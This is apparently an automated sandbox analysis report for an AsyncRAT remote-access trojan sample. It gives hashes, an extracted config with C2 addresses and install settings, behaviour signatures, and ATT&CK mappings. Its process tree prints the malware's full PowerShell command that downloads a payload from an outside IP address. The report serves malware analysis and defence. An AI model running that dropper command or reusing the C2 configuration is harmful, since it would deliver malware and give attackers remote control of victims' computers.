asyncrat | c8125da7bb61057ae54927bfbe57d59f8c3d7a85b3ee2a67aca57cbba9e4cae9

General

Target

Project7-Signed(1).exe
Size

87KB
MD5

1663d645dfd98ddeb2cda808bde92132
SHA1

470c7ee8a9db8b601bfe1b77e226ba8cddedf3f3
SHA256

c8125da7bb61057ae54927bfbe57d59f8c3d7a85b3ee2a67aca57cbba9e4cae9
SHA512

fd682199784175fe352596c29a8ca2c8d9371bdac310e2e04c131d23a8b106fb02987e76376ad36d5d8c5e733387e03eb6625fba1bc0a425cd1a00b75654c2cb
SSDEEP

1536:IprmwRE0hYuiIeKHJ6W3T3L+MvX+P60cGg9QcAxv7s5+7hEupWqP:IZV/YwhJ66T3L+mOP6DIPxv7x7hEuE2

Score

10^/10

asyncrat execution rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://149.88.66.68/test.mp3

Extracted

Family

asyncrat

C2

127.0.0.1:5419

127.0.0.1:5418

127.0.0.1:13792

123.99.198.130:5419

123.99.198.130:5418

123.99.198.130:13792

Attributes

delay
1
install
true
install_file
1.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/memory/1740-21-0x00000000003B0000-0x00000000003C6000-memory.dmp	family_asyncrat

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	2832	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2832	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2832	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2832	powershell.exe
Token: SeDebugPrivilege	1740	Project7-Signed(1).exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1740 wrote to memory of 2852	1740	Project7-Signed(1).exe	31
PID 1740 wrote to memory of 2852	1740	Project7-Signed(1).exe	31
PID 1740 wrote to memory of 2852	1740	Project7-Signed(1).exe	31
PID 2852 wrote to memory of 2832	2852	cmd.exe	33
PID 2852 wrote to memory of 2832	2852	cmd.exe	33
PID 2852 wrote to memory of 2832	2852	cmd.exe	33

C:\Users\Admin\AppData\Local\Temp\Project7-Signed(1).exe
"C:\Users\Admin\AppData\Local\Temp\Project7-Signed(1).exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell(new-object System.Net.WebClient).DownloadFile('http://149.88.66.68/test.mp3','%Temp%/test.bin')
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2852
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell (new-object System.Net.WebClient).DownloadFile('http://149.88.66.68/test.mp3','C:\Users\Admin\AppData\Local\Temp/test.bin')
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2832

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\test.bin

Filesize
97KB

MD5
25eb336fb823b92ac4ccc5410ef442b9

SHA1
93ecef340c7f652323ef950726d97cd377ba503a

SHA256
95205dd5c450dff05f04c289e394fbb460ad16038c879a1c8dd594a959adcfe5

SHA512
d1adc692c408fa679794bacc9355538001d44a9cceba3ee88d69db1dd73869c67d741e6b0dbf4e5902a13f7c8f62ce6f7865ae1acf190cefe4d7fd8816c1abf1

Download Submit
memory/1740-27-0x000007FEF52E0000-0x000007FEF5CCC000-memory.dmp

Filesize
9.9MB

Download
memory/1740-26-0x000007FEF52E3000-0x000007FEF52E4000-memory.dmp

Filesize
4KB

Download
memory/1740-25-0x000007FEF52E0000-0x000007FEF5CCC000-memory.dmp

Filesize
9.9MB

Download
memory/1740-24-0x000007FEF52E0000-0x000007FEF5CCC000-memory.dmp

Filesize
9.9MB

Download
memory/1740-22-0x000007FEF52E0000-0x000007FEF5CCC000-memory.dmp

Filesize
9.9MB

Download
memory/1740-23-0x000007FEF52E0000-0x000007FEF5CCC000-memory.dmp

Filesize
9.9MB

Download
memory/1740-21-0x00000000003B0000-0x00000000003C6000-memory.dmp

Filesize
88KB

Download
memory/1740-20-0x000007FEF52E3000-0x000007FEF52E4000-memory.dmp

Filesize
4KB

Download
memory/1740-17-0x0000000000300000-0x0000000000319000-memory.dmp

Filesize
100KB

Download
memory/1740-19-0x0000000000300000-0x0000000000319000-memory.dmp

Filesize
100KB

Download
memory/2832-7-0x0000000001ED0000-0x0000000001ED8000-memory.dmp

Filesize
32KB

Download
memory/2832-15-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2832-13-0x000007FEF55EE000-0x000007FEF55EF000-memory.dmp

Filesize
4KB

Download
memory/2832-12-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2832-11-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2832-10-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2832-4-0x000007FEF55EE000-0x000007FEF55EF000-memory.dmp

Filesize
4KB

Download
memory/2832-8-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2832-9-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2832-6-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2832-5-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads